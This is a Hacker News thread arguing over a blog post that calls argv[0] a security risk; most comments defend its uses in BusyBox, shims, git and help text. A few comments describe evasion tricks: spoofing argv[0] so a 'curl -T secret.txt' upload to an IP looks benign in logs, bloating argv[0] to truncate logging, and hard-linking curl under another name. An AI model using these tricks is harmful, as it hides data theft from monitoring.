Hacker News

Why bother with argv[0]?

by wietzeon 9/3/2024, 12:30:06 PM with 56 comments

by yjftsjthsd-hon 9/3/2024, 2:50:41 PM
So obviously claiming that there's no good reason for a process to read argv[0] either demonstrates the author's ignorance or needs a much stronger defense; I'd be fascinated to hear how they think busybox should work on an OpenWrt box with a 16MB root filesystem.
However, I am willing to consider the discussion about whether there could be merit to restricting the ability to write that value; I could imagine a system that populated it only from the actual file name and did not allow it to be written by the parent process or the child process at runtime. The obvious place this still falls apart is that an attacker could just
```
    ln /bin/curl ./some\ other\ name
```
but we sometimes use security measures even though they're less than 100% effective, so it is at least conceivable that this might be a trade-off worth making.
by avidiaxon 9/3/2024, 1:51:53 PM
It is sometimes used to allow one binary to be the symlink target of hundreds of commands.
Android does this for most common shell commands. Toybox and busybox are examples of such implementations.
https://github.com/landley/toybox
https://en.m.wikipedia.org/wiki/BusyBox
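For anyone who hasn't seen the trick, here is a minimal sketch of how a multi-call program might pick its behavior from argv[0]. The applet names (`hello`, `count`) and the `dispatch` helper are made up for illustration; this is not how BusyBox or toybox are actually implemented, just the general shape of the idea.

```python
import os

# Hypothetical applets; a real multi-call binary would register many more.
def applet_hello(args):
    return "hello " + " ".join(args)

def applet_count(args):
    return str(len(args))

APPLETS = {"hello": applet_hello, "count": applet_count}

def dispatch(argv):
    """Pick an applet from the basename of argv[0]."""
    name = os.path.basename(argv[0])
    if name in APPLETS:
        return APPLETS[name](argv[1:])
    # Invoked under its own name: treat the first argument as the applet.
    if len(argv) > 1 and argv[1] in APPLETS:
        return APPLETS[argv[1]](argv[2:])
    raise ValueError(f"{name}: applet not found")

# The same code behaves differently depending on the name it was called by.
print(dispatch(["/usr/bin/hello", "world"]))
print(dispatch(["./count", "a", "b"]))
```

Each symlink (or hard link) to the one file then only costs a directory entry.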
by travisgriggson 9/3/2024, 2:38:13 PM
> “Should a program be allowed to behave differently based on its name?”
I don’t see why not. It’s allowed to behave differently based on the arguments that follow it. I personally think the genericity of including the program name itself as one of its own calling arguments is really meta cool.
by theamkon 9/3/2024, 2:43:03 PM
That's a weird take against argv[0] - all arguments are: "goes against modern design principles" and "can confuse programs which use argv[0] when they wanted "exec" instead"
For the former, I don't see how this goes against modern principles - in the presence of symlinks, it is pretty reasonable to want to know both "how was this program called" and "what's the actual executable we ended up with". And this does more than just give multiple names to the same program - for example python uses argv[0] to tell if it's inside a virtualenv and adjust search paths accordingly. This makes it appear like there are multiple python installs on the system, with no extra disk space taken.
For the latter, yes, programs can have bugs and OSes can have non-obvious semantics, and if you are security software, it's very important to be aware of them. I would not mark "argv[0]" as something especially bad from a security perspective. All the author's examples would still be possible in a hypothetical world where argv[0] is set by the system - as nothing stops a user from creating a symlink in a temporary dir with a deceptive name (spaces and quotes are OK in filenames!) and exec'ing it directly. Instead, fix your security software so it quotes argv values?
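As a rough illustration of the "quote argv values" suggestion, here is a small sketch using Python's standard `shlex.join`. The `format_argv_for_log` name and the spoofed argv are invented for the example; real security tooling would have its own logging format.

```python
import shlex

def format_argv_for_log(argv):
    """Render argv so each element's boundaries stay visible in a log line."""
    return shlex.join(argv)

# Hypothetical spoofed invocation: argv[0] contains spaces and a pipe character.
spoofed = ["curl localhost | grep", "-T", "secret.txt", "123.45.67.89"]

print(" ".join(spoofed))             # naive join: reads like a harmless pipeline
print(format_argv_for_log(spoofed))  # quoted: the odd argv[0] stands out
```

With quoting, a deceptive argv[0] shows up as one suspicious quoted token instead of blending into the rest of the command line.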
by jrockwayon 9/3/2024, 4:59:59 PM
I think argv[0] is fine. It sounds like there is a lot of bad security scanning software that doesn't understand how the `exec` syscall works. That sounds like their problem and not a fundamental problem with argv[0].
Most people use argv[0] so they can do something like:
```
   $ mycommand help
   Type `mycommand foo bar` to foo bars.

   $ mycommand1.2.3 help
   Type `mycommand1.2.3 foo bar` to foo bars.
```
This is admittedly less fun when mycommand is `/home/jrockway/.cache/bazel/_bazel_jrockway/7f95bd5e6dcc2e75a861133ddc7aee82/execroot/_main/bazel-out/k8-fastbuild/mycommand/mycommand_/mycommand` however.
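One way to soften the long-path case is to print only the basename. A minimal sketch, assuming a hypothetical `usage` helper and a made-up fallback name for the case where argv[0] is empty:

```python
import os

def usage(argv0, fallback="mycommand"):
    """Build a help line that echoes the name the program was invoked as."""
    # basename drops the directory part; the fallback covers an empty argv[0].
    name = os.path.basename(argv0) or fallback
    return f"Type `{name} foo bar` to foo bars."

print(usage("mycommand1.2.3"))
print(usage("/some/very/long/build/dir/mycommand"))
```

The trade-off is that the printed command may not be runnable as-is if the directory is not on PATH.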
by kelsey98765431on 9/3/2024, 1:52:59 PM
This is how busybox works in 'shim' mode. I am not, however, concerned with the security argument here: if you have the ability to run code, you have the ability to do n to the power of x insidious things, and argv[0] abuse is just one of dozens (hundreds?) of vectors or useful building blocks in an attack. If we are suddenly giving a shit about security on nixens, we should be looking at deeper SELinux rollouts (ease of use for sysadmins and maintainers, so we never see permissive mode instead of just applying the difficult-to-remember command that will patch your policy settings). We need root capabilities to continue to be separated in the kernel access control scheme, and we probably need to start using namespaces much more liberally, like projects such as silverblue/bluefin which reimplement the entire OS stack as a series of containers. Stronger container foundations and ease of use for existing security mechanisms will take us much further than worrying about ANYTHING else in the ABI, which by the way will never change as long as Linus is alive, and he will most likely live on forever as an LLM, given the number of mailing list posts he has made over the years.
by js2on 9/3/2024, 3:29:59 PM
> Today however, disk space is no longer considered an issue; this is evidenced by macOS Sonoma, where shutdown and reboot are two separate executables.
Try running `ls -li /usr/bin` on macOS and you might be surprised to learn that all of these are a single executable: DeRez, GetFileInfo, Rez, SetFile, SplitForks, ar, as, asa, ... yacc. There's 77 different entries in `/usr/bin` (including `git` and `python3`) that are all links to the same binary (`com.apple.dt.xcode_select.tool-shim`). It's a wrapper that implements the `xcode-select` concept to locate and run the real executable provided by either the Command Line Tools package or a particular Xcode version you may have installed.
And that's not the only one. There's another 68 links starting with `binhex.pl` and ending with `zipdetails` that are a single 811 byte wrapper-script around perl.
Altogether, I see that there are 26 different names that are multiply linked:
```
  ls -li /usr/bin |
  awk '{print $1}' |
  sort | uniq -c |
  sort -n | grep -v "^\s*1\s" | wc -l
```
Some of the other examples: less & more, bc & dc, atrm & batch, stat & readlink.
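For anyone who wants the actual names rather than a count, here is a rough Python equivalent of the pipeline above. It groups directory entries by inode; the `multiply_linked` name is made up, and like the `ls` version it only sees links that live in the same directory.

```python
import os
from collections import defaultdict

def multiply_linked(directory):
    """Group names in `directory` that share one inode (hard links)."""
    groups = defaultdict(list)
    for entry in os.scandir(directory):
        # Do not follow symlinks: we want the inode of the entry itself.
        st = entry.stat(follow_symlinks=False)
        groups[(st.st_dev, st.st_ino)].append(entry.name)
    # Keep only inodes that appear under more than one name.
    return sorted(sorted(names) for names in groups.values() if len(names) > 1)
```

Something like `len(multiply_linked("/usr/bin"))` should then give the number of multiply-linked inodes, and printing the result shows which names belong together.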
Having a program behave dynamically based on argv[0] is a useful tool in the Unix toolbox. The alternative would be compiling 77 different versions of `tool-shim`, creating 68 different versions of that perl wrapper, etc.
The `git` binary uses this concept too. You can create an executable named `git-foo`, put it anywhere in your PATH, and then call it as `git foo`.
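A sketch of what that kind of lookup might look like, using `shutil.which` from the standard library. The `find_external_subcommand` helper is hypothetical and this is not git's actual lookup code; it only illustrates the `<tool>-<subcommand>` naming convention.

```python
import shutil

def find_external_subcommand(tool, subcommand, path=None):
    """Return the path of `<tool>-<subcommand>` if it is executable on PATH.

    `path` defaults to the PATH environment variable when left as None.
    """
    return shutil.which(f"{tool}-{subcommand}", path=path)

# Example: look for an executable named "git-foo" on the current PATH.
print(find_external_subcommand("git", "foo"))
```

If the helper returns a path, the front-end can exec it with the remaining arguments; if it returns None, it can report an unknown subcommand.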
In the end, argv[0] is just an argument that can be used to improve CLI ergonomics and reduce code duplication. It's not solely about disk space. I think that makes it a more common and useful concept than you give it credit for.
As to the rest of the post: I'm not really sure how argv[0] being in the caller's control is any different than the rest of the execution context being in the caller's control: the remaining arguments, the environment, limits on file descriptors, which file descriptors are open, the program's real and effective uid and gid, signals it might receive and so on. These all amount to untrusted input any executable has to be cognizant of, more or less so depending upon what privileges the executable has and what its goals are.
by dcminteron 9/3/2024, 2:10:46 PM
This lost me at "goes against modern design principles" without citing what principle(s) the author had in mind that would proscribe it.
by lanstinon 9/3/2024, 2:24:28 PM
This article seems to be an example of how some common security practices are kind of surface level. If you want to limit what a box can access on the network, do it in the network. Why is security looking for bad URLs in the argv? If you know they are bad, just block them. Or better yet, if they aren't good, don't allow them. And if you want to know what a process is doing, ask the kernel to log its syscalls. If you take away argv[0] you will lose some valuable stuff (cute little busybox links, error logs that have argv[0] in them), and attackers will just name payload.exe ls.exe. And if your network is allow-all, they will still reach the CNC or collector endpoint.
by skobeson 9/3/2024, 2:12:41 PM
"Windows’ own API calls for creating new processes (such as CreateProcess [6], ShellExecute [7]) do not allow you to set argv[0]: it sets it for you, based on how the path to the executable was provided."
Isn't this contradicted by the docs? CreateProcess receives lpApplicationName and lpCommandLine, and they can be different.
by halaylion 9/3/2024, 6:26:36 PM
> This seems like a questionable design decision. Should a program be allowed to behave differently based on its name? From a 2020s standpoint, this seems highly undesirable, as it makes software less predictable and goes against modern design principles.
No, it doesn't make software less predictable, nor does it go against modern design principles. argv has very handy use cases and can be used to provide a better user experience.
Unless you have evidence to back up your claims, you're just presenting a subjective opinion as an objective one without any merit.
Either way, it's the software developer's choice, and as irrelevant to the user as whether the developer prefers for(;;) over while(1).
by JohnFenon 9/3/2024, 2:02:41 PM
> Today however, disk space is no longer considered an issue
On desktop machines, perhaps, but this is certainly not true on all platforms Linux runs on.
by blenderobon 9/3/2024, 2:59:50 PM
> argv[0] is a relic of the past
Busybox says hello.
Seriously though, how is this on the front page? Both the premise and conclusions contradict the reality of how argv[0] is used with symbolic links and hard links.
by josefxon 9/3/2024, 1:56:53 PM
Microsoft defender using broken by design detection rules? One could almost think it is an anti virus program.
by dotancohenon 9/3/2024, 2:09:39 PM
I also use argv[0] for the -h help text, to show examples how to use the command.
by kelnoson 9/4/2024, 2:06:37 AM
> From a 2020s standpoint, this seems highly undesirable, as it makes software less predictable and goes against modern design principles.
Says who? I'm not aware of any modern design principles that say anything about this sort of thing.
> argv[0] is ignored (mostly)
Pretty much any program I've written that has a --help option uses argv[0] to print out the usage string, i.e.:
```
    printf("%s [--some-arg] FILENAME\n", argv[0]);
```
> First off, argv[0] can be used to fool security software
Then that security software is poorly written. On Linux, the correct way to find the binary of a running process is by calling readlink(2) on /proc/$PID/exe. Assuming security software like this is going to have a lot of OS-specific code, it seems fine to me to expect they use it (and then have to do other things on other OSes).
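A minimal, Linux-only sketch of that approach, with hypothetical helper names. It reads the kernel's view of the binary (`/proc/<pid>/exe`) next to the argv the process claims (`/proc/<pid>/cmdline`), and returns None where /proc is unavailable or the process is not readable.

```python
import os

def real_executable(pid):
    """Resolve the binary backing `pid` via /proc; None if unavailable."""
    try:
        return os.readlink(f"/proc/{pid}/exe")
    except OSError:
        return None

def claimed_argv(pid):
    """Return the argv the process reports; its parent or itself controls this."""
    try:
        with open(f"/proc/{pid}/cmdline", "rb") as f:
            raw = f.read()
    except OSError:
        return None
    parts = raw.split(b"\0")
    if parts and parts[-1] == b"":
        parts.pop()  # drop the empty piece after the trailing NUL
    return [p.decode(errors="replace") for p in parts]

pid = os.getpid()
print(real_executable(pid), claimed_argv(pid))
```

Only the first value is set by the kernel; the second is whatever the caller passed to exec, possibly rewritten later by the process.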
> Another argument against this design is that if you have two programs that are so similar that it pays off to consolidate them into a single file, is there really a need for two separate programs/program names?
The author is talking about shutdown and reboot being symlinks to systemctl on systemd-based systems. But what about something like busybox? busybox contains hundreds of programs, all conveniently in a single, statically-linked binary. On my system it's about 800kB. While I agree that even 250MB is not a big deal for most systems these days, it certainly is a problem for, say, a WiFi router that only has 8MB of flash.
> Ultimately, nobody wants to be bothered by argv[0].
False. I find it useful, and am not "bothered" by it at all. And I suspect security folks aren't really bothered either: the ones that actually know what they're doing look at /proc/$PID/exe when they want to find the binary backing a PID.
This article is kinda lame, and it seems like the author's objections are mostly based on ignorance.
by remramon 9/3/2024, 8:04:18 PM
> From a 2020s standpoint, this seems highly undesirable, as it makes software less predictable and goes against modern design principles.
This is not an argument at all, this is a statement that arguments exist. What are they?
It's like saying we shouldn't do something because it's "against best practices". I'm asking why are other practices preferred...
by andrewmcwatterson 9/3/2024, 2:07:27 PM
I wish amateurs would stop propagating the false idea that disk space and memory are cheap and not a problem.
by layer8on 9/3/2024, 3:35:32 PM
If nothing else, argv[0] is useful for producing error messages that indicate the name of the executable that is outputting the message.
It's probably a good idea to not have it settable to other values by the invoking process, as is generally the case on Windows (ignoring its POSIX subsystem here).
by CamJNon 9/3/2024, 3:56:48 PM
This is near and dear to my heart. I wanted to make a utility to get the arguments of other processes, and found after looking that every single use of the KERN_PROCARGS2 sysctl (used on macOS) on the internet is wrong (they assume argv[0] is not an empty string), including Apple's and Google's. So after making my utility I also made a library out of it, both are bsd-3, but non-gratis: https://getargv.narzt.cam/
by cryptonectoron 9/3/2024, 3:49:57 PM
Please no. If you want to know what a process is running, look carefully in `/proc` or use `lsof` or whatever, but no, please, `argv[0]` is super useful. I use it, lots of people use it. And it's well known that pstrings can be abused to hide things from `ps`, but so what, it's been that way for 4+ decades and it's a well-known "problem" (it's not a problem).
by sphon 9/4/2024, 1:22:47 PM
What a silly post. I use argv[0] in my host-spawn tool (https://github.com/1player/host-spawn) so one can symlink it to a name inside a container and when you run it, it's executed on the host.
```
    # Inside your container:

    $ flatpak --version
    zsh: command not found: flatpak

    # Have host-spawn handle any flatpak command
    $ ln -s /usr/local/bin/host-spawn /usr/local/bin/flatpak

    # Now flatpak will always be executed on the host
    $ flatpak --version
    Flatpak 1.12.7
```
I am able to tell the symlink name by reading argv[0] to know which command to run. It is such a powerful and neat UNIX trick that has no simple alternative (in this example one would have to write ad-hoc shell scripts for each command they want to run)
by tqwhiteon 9/3/2024, 3:53:03 PM
argv[0] is a parameter. Like any user input, it should be treated skeptically. There is absolutely nothing wrong with allowing more than one way to invoke the same program. This article is simply silly. Fortunately, it will be ignored completely since acting on it would break the universe.
by jujube3on 9/3/2024, 5:06:07 PM
Problem: virus scanning software on Windows is broken.
Solution: we should not use argv[0]?
by hi-v-rocknrollon 9/3/2024, 4:20:49 PM
Arguing against legacy quirks is arguing against compatibility and arguing for throwing away decades of code portability guarantees through 20/20 hindsight perfectionism failing to consider the costs and burdens of reimagining the world with bikeshedding rants.
by kazinatoron 9/3/2024, 7:46:05 PM
The author doesn't seem to understand that argv[0] can be different due to, for instance, one executable implementing many programs, such as BusyBox and similar projects.
While argv[0] is old, if you had to design it from scratch today, it would still be a good idea to have the program invocation name as an argument.
The idea that anything old must be a historic quirk that we can eliminate today is flawed.
Now argv[0] should not be relied upon for obtaining the executable name, except as a last resort if the program is built for platforms that don't have anything else. But if one executable has multiple program names via symlinks, only argv[0] will distinguish them.
by Brian_K_Whiteon 9/3/2024, 7:50:52 PM
This is stupid. argv0 is just some data like any other data.
It's ridiculously useful aside from the obvious busybox style usage.
It's huge to be able to have a pointer to the directory where the executable resides, so you can package other assets alongside it and have it all work for free without a separate configuration file or env variables etc.
Or for debugging or even non-error logging. You might call a binary from more than one place by other means than symlinks or hard links. You might be running from different mounted filesystems, chroot or container environments etc. A symlink might be in the middle of the path and not the executable name itself. Similarly a mount point.
It's just a random small useful tool like all others. Calling it some kind of security problem is like saying that screwdrivers are a security problem because aside from turning screws, some people can use screwdrivers to stab people, and we have nut drivers which can serve almost all the same needs for only a little extra work.
If your context of the moment means you have a security concern where you shouldn't trust this bit of data as gospel for some reason, then don't. Treat it like user input and take whatever precautions and fallback measures and sanity checks make sense for you in whatever particular situation you are in.
F-ing dumb.
by PaulHouleon 9/3/2024, 4:48:35 PM
It’s part of the shambolic world of Unix and C. But “worse is better!”
A good language spec is laid out in a way that reads from front to back with minimized circularity. See Common Lisp, Java, Python, etc.
As a kid in high school checking out Unix manuals and implementing many Unix tools in
https://subethasoftware.com/2022/09/27/exploring-1984-os-9-o...
I struggled with K&R because of the circularity of the book, which was really an anomaly built into C, the culture of C, or both, because C++ books still read this way. C had so many half-baked things, such as an otherwise clean parser that required access to the symbol table. And of course a general fast-and-looseness which led to the buffer overflow problem.
There were other languages which failed to solve the systems programming problem like PL/I and Ada, not to mention ISO Pascal which could have tried but didn’t. (Turbo Pascal proved it could have been done.)
People took until 1990 or so to be able to write good language specs consistently, so we can forgive Unix but boy is it awful if you look closely at it. On the other hand, IBM never did make a universal OS for the “universal” 360, yet Unix proved to be adaptable for almost everything.
by linsomniacon 9/3/2024, 9:55:21 PM
"Security" software that trusts /proc/$PID/cmdline (and the like), and in particular doesn't complain when /proc/$PID/cmdline mismatches /proc/$PID/exe, doesn't seem like very useful security software to me. Particularly if it's security software that is making security decisions based on argv[0].
Seems like this security software is broken, not argv[0].
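A rough sketch of the kind of mismatch check meant here, written as pure functions over the raw bytes of a cmdline file and the resolved exe path. The function names are invented, and a basename comparison is only a heuristic: it will also flag legitimate multi-call setups such as `ls` being a link to busybox, so it is a signal to look closer, not a verdict.

```python
import os

def parse_cmdline(raw):
    """Split the NUL-separated bytes of a /proc/<pid>/cmdline file into argv."""
    parts = raw.split(b"\0")
    if parts and parts[-1] == b"":
        parts.pop()  # drop the empty piece after the trailing NUL
    return [p.decode(errors="replace") for p in parts]

def argv0_mismatch(raw_cmdline, exe_path):
    """True when argv[0]'s basename differs from the real binary's basename."""
    argv = parse_cmdline(raw_cmdline)
    if not argv:
        return True  # an empty argv is itself worth flagging
    # Login shells are conventionally started with a leading "-" in argv[0].
    claimed = os.path.basename(argv[0].lstrip("-"))
    return claimed != os.path.basename(exe_path)

print(argv0_mismatch(b"curl localhost | grep\0-T\0secret.txt\0", "/usr/bin/curl"))
print(argv0_mismatch(b"/usr/bin/curl\0-T\0secret.txt\0", "/usr/bin/curl"))
```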
by keepamovinon 9/3/2024, 2:05:38 PM
This is why we can't have nice things. Security footguns everywhere!
I'm fascinated by the intersection of argv[0], and the execve behavior of replacing the calling program with the called one.
Aside from that, I quite like argv[0], for a much more limited set of reasons than considered in this interesting and comprehensive article. I like the ability to "retitle" a process to put a useful, descriptive, or branded name in there to be seen by ps, et al.
NodeJS also exposes this feature, but not quite as you might expect. Whereas in C, setting argv[0] from within the program's execution context will alter what is observed by ps, in NodeJS process.argv is just a descriptive getter. Setting its slots has no effect outside of its context.
But this is where process.title steps in. Setting process.title allows you to (in an OS-dependent way) change the name reported in ps and similar tools.
Read more here: https://nodejs.org/api/process.html#processtitle
Please don't kill argv[0], its lease hath all too short a date
by Dwediton 9/3/2024, 3:59:58 PM
How about the part about knowing what the directory the executable was launched from? It could be different than the working directory.
by thayneon 9/4/2024, 4:07:28 PM
> and (especially a few decades ago) can offer cross-platform/backwards syntax compatibility using a shared code base.
This is still very much an issue. For the shutdown and reboot case, the main reason those symlinks exist is backwards compatibility for existing programs and scripts (and muscle memory) that assume there is a shutdown or reboot command, and compatibility with systems that don't use systemd.
Another way to do that could be to use a shell script that execs systemctl, but that requires a separate intermediate shell process, which may have its own compatibility issues.
Another use of argv[0] that isn't discussed at all is putting a hyphen at the beginning of argv[0] for login shells. For example if bash is invoked as the login shell argv[0] is "-bash". That probably wasn't a great design decision, but changing it now would probably cause a lot of breakage.
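The leading-hyphen convention is simple enough to sketch in a couple of lines. The `split_login_marker` helper below is hypothetical and only models the argv[0] part of the rule, not any other way a shell might decide it is a login shell.

```python
def split_login_marker(argv0):
    """Return (is_login, name) following the leading-hyphen convention."""
    if argv0.startswith("-"):
        return True, argv0[1:]
    return False, argv0

print(split_login_marker("-bash"))      # started as a login shell
print(split_login_marker("/bin/bash"))  # ordinary invocation
```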
by Arch-TKon 9/3/2024, 3:25:52 PM
For a command line utility, argv[0] is nice to see in error messages (e.g. `./tool: fatal: Could not open './file' for reading`). When the shell combines stdout and stderr, it's easier to spot exactly what you just typed as argv[0] from all the other output.
For most other things, definitely unnecessary.
by johnisgoodon 9/4/2024, 12:24:02 PM
So wait, I should not use `argv` in C's main() or what?
Is it only speaking against `argv[0]` or `argv` in general?
What is this proposed solution if any?
What about `__progname`? The only issue here is that if `argv[0]` is a path, then `__progname` is only the filename. What if I want the path?
by gwbas1con 9/3/2024, 5:44:40 PM
The author's extensive criticisms of using argv[0] are a distraction from the main point of the article:
Summary: By manipulating argv[0], a malicious program can hide what it's doing in security logs. For example, a malicious program can make "curl -T secret.txt 123.45.67.89" look like "curl localhost | grep -T secret.txt 123.45.67.89" in security logs. A malicious program can also use very large argv[0] values as a DoS attack on system logging, or to truncate malicious arguments.
IMO, operating systems should block this practice.
Unfortunately, the author's extensive criticism of programs reading argv[0] hurts the author's credibility before most people get to the real point of the article.
by tantaloron 9/3/2024, 2:29:57 PM
The name of something is not an intrinsic property.
by guappaon 9/3/2024, 1:49:29 PM
Wait until he finds out about busybox!
Also claiming that the windows API to call a new process is good… wow… I guess he's never had to pass a filename with quotes and spaces in its name. The API expects you to do the escaping yourself. Yes it needs to be escaped, because it's all one single string.
by t43562on 9/3/2024, 3:34:43 PM
arg0 also contains the path from where the invoker invoked the binary so for me this enables all sorts of binaries that work out where their dependencies are relative to their original binary. That's extremely convenient because you can combine it with $PWD to find out the absolute path to the binary.
One can then guess what the PYTHONPATH and LD_LIBRARY_PATH should be most of the time and save someone from having to set them.
Obviously this is of most use when you're running something you've installed into /opt (e.g. /opt/myprog/bin, /opt/myprog/lib etc) or are running it from the source tree.
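A minimal sketch of that idea, assuming a `<prefix>/bin/<name>` plus `<prefix>/lib` layout like the /opt/myprog example. The helper names are invented, the working directory has to be the one captured at startup, and since argv[0] is caller-controlled the result is best treated as a hint rather than a guarantee.

```python
import os
import shutil

def invocation_path(argv0, cwd, search_path=None):
    """Best-effort absolute path of the invoked file, derived from argv[0]."""
    if os.sep in argv0:
        # Relative or absolute path: resolve against the startup directory.
        return os.path.normpath(os.path.join(cwd, argv0))
    # Bare name: the shell found it on PATH, so repeat that search.
    return shutil.which(argv0, path=search_path)

def guess_lib_dir(argv0, cwd, search_path=None):
    """Guess <prefix>/lib for a binary installed at <prefix>/bin/<name>."""
    exe = invocation_path(argv0, cwd, search_path)
    if exe is None:
        return None
    return os.path.join(os.path.dirname(os.path.dirname(exe)), "lib")

print(guess_lib_dir("./bin/myprog", "/opt/myprog"))
```

A program could then prepend the guessed directory to PYTHONPATH or LD_LIBRARY_PATH only when the user has not set them.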
by JoyfulPandaon 9/4/2024, 12:57:25 PM
Holy moly, the article addresses argv[0] as the problem, while the real problem is that the snake oil industry has no clue what they are doing
by suprjamion 9/4/2024, 1:09:10 AM
It's not often a self-promotion blog post has the entirety of HN telling you you're wrong. Better luck next time lol
by anacrolixon 9/4/2024, 2:49:45 AM
I think the Unix philosophy wins here. It might not be a clean interface but let the implementations decide what to do with it. If you remove it you are more likely to cause issues and have to grow new interfaces elsewhere.
by azlevon 9/3/2024, 3:29:25 PM
I don't think the argv was made with security in mind.
If we want something to be used in security field, the design since day 0 should consider it. Trying to retrofit something will break a lot of things.
by nmzon 9/6/2024, 2:22:31 PM
Really strange that argv[0] has a basically unlimited character size while #! has a hardcoded 256 byte limit.
by mannyvon 9/3/2024, 2:19:16 PM
"Remember, the safest computer is one that's turned off and unplugged."
by omphaloskepticon 9/3/2024, 2:41:06 PM
Also, on POSIX systems, exec-ing a program with argv[0] starting with ‘-’ will have it start as a login shell, which is a whole rabbit hole of its own. I’m sure it’s within the security model (and the linked article doesn’t really discuss the concept of OS security models), but it’s still a pretty big shift in behaviour just from adding a character to the argv[0] value.
by account42on 9/5/2024, 9:35:20 AM
> This seems like a questionable design decision.
Nope.
> Should a program be allowed to behave differently based on its name?
Yes. The program can also inspect any other part of its environment, including the parent process. What makes sense to inspect here depends on the particular program in question. The symlink example is still useful today.
> From a 2020s standpoint, this seems highly undesirable
Nope.
> it makes software less predictable
It doesn't. It makes it more predictable if programs can easily provide compatibility interfaces. Yes, you could do the same with a wrapper but removing friction matters.
> and goes against modern design principles.
Then modern design principles can take a hike.
> Today however, disk space is no longer considered an issue
It should be considered an issue though. I buy better hardware to get more use out of it, not for lazy developers to needlessly piss it all away.
This is just yet another example of "security" people trying to make their lives easier by making others' lives harder. And as usual it's only theater, since almost all of the "exploits" apply to arguments as well, which for many programs provide plenty of opportunity to include arbitrary strings. Fix your tools instead of expecting the world to work around their limitations.
by hinkleyon 9/3/2024, 3:19:02 PM
> Today however, disk space is no longer considered an issue;
Tell me you don’t use Docker without telling me you don’t use Docker.
I’d argue the certutil problem the author mentions is a flaw in certutil, not argv’s fault. Doesn’t that mean it falls to symlinks as well?
If you look at sudo, it’s generally deny by default. Rename a program all you want, you won’t get to use it unless you can overwrite a program that is in the sudoer file. So I don’t know what nonsense certutil is playing at if it’s using argv to do its job. That’s appalling.
by KingOfCoderson 9/3/2024, 2:48:55 PM
I use argv[0] to monitor the binary by itself and restart when it has changed.
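One way such self-monitoring could look, as a sketch only: record a cheap fingerprint of the file at startup and poll it later. The helper names are made up, and the path would typically come from argv[0] resolved to an absolute path at startup.

```python
import os

def binary_signature(path):
    """Cheap fingerprint of a file: modification time, size, and inode."""
    st = os.stat(path)
    return (st.st_mtime_ns, st.st_size, st.st_ino)

def should_restart(path, baseline):
    """True when the file at `path` no longer matches the startup fingerprint."""
    try:
        return binary_signature(path) != baseline
    except FileNotFoundError:
        return False  # possibly mid-replacement; check again on the next poll
```

When `should_restart` returns True, the process could re-exec itself with something like `os.execv(path, sys.argv)`, which replaces the running image while keeping the same PID.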
by nottorpon 9/3/2024, 8:19:11 PM
<Cough> Busybox.
There is life outside the enterprise security theater.
by gorjusborgon 9/3/2024, 4:07:36 PM
Why bother asking?
by port19on 9/4/2024, 7:07:08 AM
L Take
by mzson 9/3/2024, 6:48:27 PM
"A login shell is one whose first character of argument zero is a -"